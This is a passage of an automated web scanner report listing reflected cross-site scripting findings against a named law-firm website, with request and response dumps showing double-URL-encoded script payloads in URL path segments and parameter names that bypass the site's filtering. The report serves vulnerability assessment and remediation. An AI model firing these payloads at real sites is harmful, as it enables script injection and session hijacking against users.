Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui81a0d"><script>alert(1)</script>ee949bf1e89/ui.tabs.css" value="">
...[SNIP]...

2.94. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.tabs.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b92b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93dc2b44d56 was submitted in the REST URL parameter 3. This input was echoed as b92b8"><script>alert(1)</script>93dc2b44d56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.tabs.cssb92b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93dc2b44d56 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.tabs.cssb92b8"><script>alert(1)</script>93dc2b44d56" value="">
...[SNIP]...

2.95. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.theme.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b59%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb748a2e0a4d was submitted in the REST URL parameter 1. This input was echoed as f8b59"><script>alert(1)</script>b748a2e0a4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssf8b59%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb748a2e0a4d/ui/ui.theme.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssf8b59"><script>alert(1)</script>b748a2e0a4d/ui/ui.theme.css" value="">
...[SNIP]...

2.96. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.theme.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f482%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de43e0d372 was submitted in the REST URL parameter 2. This input was echoed as 9f482"><script>alert(1)</script>5de43e0d372 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui9f482%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de43e0d372/ui.theme.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui9f482"><script>alert(1)</script>5de43e0d372/ui.theme.css" value="">
...[SNIP]...

2.97. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.theme.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20285%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9291800f59c was submitted in the REST URL parameter 3. This input was echoed as 20285"><script>alert(1)</script>9291800f59c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.theme.css20285%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9291800f59c HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.theme.css20285"><script>alert(1)</script>9291800f59c" value="">
...[SNIP]...

2.98. http://www.wileyrein.com/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30fea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e818c7828cb8 was submitted in the REST URL parameter 1. This input was echoed as 30fea"><script>alert(1)</script>818c7828cb8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /index.cfm30fea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e818c7828cb8 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/index.cfm30fea"><script>alert(1)</script>818c7828cb8" value="">
...[SNIP]...

2.99. http://www.wileyrein.com/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7f23"><script>alert(1)</script>472c4d98eb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?e7f23"><script>alert(1)</script>472c4d98eb6=1 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="e7f23"><script>alert(1)</script>472c4d98eb6" value="1">
...[SNIP]...

2.100. http://www.wileyrein.com/js/jq.equalheights.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/jq.equalheights.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d732e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c700324221 was submitted in the REST URL parameter 1. This input was echoed as d732e"><script>alert(1)</script>3c700324221 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsd732e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c700324221/jq.equalheights.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/jsd732e"><script>alert(1)</script>3c700324221/jq.equalheights.js" value="">
...[SNIP]...

2.101. http://www.wileyrein.com/js/jq.equalheights.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/jq.equalheights.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f70d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0445fb7d91b was submitted in the REST URL parameter 2. This input was echoed as f70d5"><script>alert(1)</script>0445fb7d91b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/jq.equalheights.jsf70d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0445fb7d91b HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/jq.equalheights.jsf70d5"><script>alert(1)</script>0445fb7d91b" value="">
...[SNIP]...

2.102. http://www.wileyrein.com/js/jquery.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67315%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e635a97b6d45 was submitted in the REST URL parameter 1. This input was echoed as 67315"><script>alert(1)</script>635a97b6d45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js67315%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e635a97b6d45/jquery.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js67315"><script>alert(1)</script>635a97b6d45/jquery.js" value="">
...[SNIP]...

2.103. http://www.wileyrein.com/js/jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d428a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e229db4da92d was submitted in the REST URL parameter 2. This input was echoed as d428a"><script>alert(1)</script>229db4da92d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/jquery.jsd428a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e229db4da92d HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/jquery.jsd428a"><script>alert(1)</script>229db4da92d" value="">
...[SNIP]...

2.104. http://www.wileyrein.com/js/menu.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/menu.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0519%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e056a75bdc24 was submitted in the REST URL parameter 1. This input was echoed as a0519"><script>alert(1)</script>056a75bdc24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsa0519%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e056a75bdc24/menu.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/jsa0519"><script>alert(1)</script>056a75bdc24/menu.js" value="">
...[SNIP]...

2.105. http://www.wileyrein.com/js/menu.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/menu.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99218231cb0 was submitted in the REST URL parameter 2. This input was echoed as 72b32"><script>alert(1)</script>99218231cb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/menu.js72b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99218231cb0 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/menu.js72b32"><script>alert(1)</script>99218231cb0" value="">
...[SNIP]...

2.106. http://www.wileyrein.com/js/script.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/script.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 651f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51a543addfc was submitted in the REST URL parameter 1. This input was echoed as 651f5"><script>alert(1)</script>51a543addfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js651f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51a543addfc/script.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js651f5"><script>alert(1)</script>51a543addfc/script.js" value="">
...[SNIP]...

2.107. http://www.wileyrein.com/js/script.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/script.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a7d4ade41c was submitted in the REST URL parameter 2. This input was echoed as a9d57"><script>alert(1)</script>6a7d4ade41c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/script.jsa9d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a7d4ade41c HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/script.jsa9d57"><script>alert(1)</script>6a7d4ade41c" value="">
...[SNIP]...

2.108. http://www.wileyrein.com/js/ui.core.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.core.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bbc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5280505d079 was submitted in the REST URL parameter 1. This input was echoed as 2bbc8"><script>alert(1)</script>5280505d079 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js2bbc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5280505d079/ui.core.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
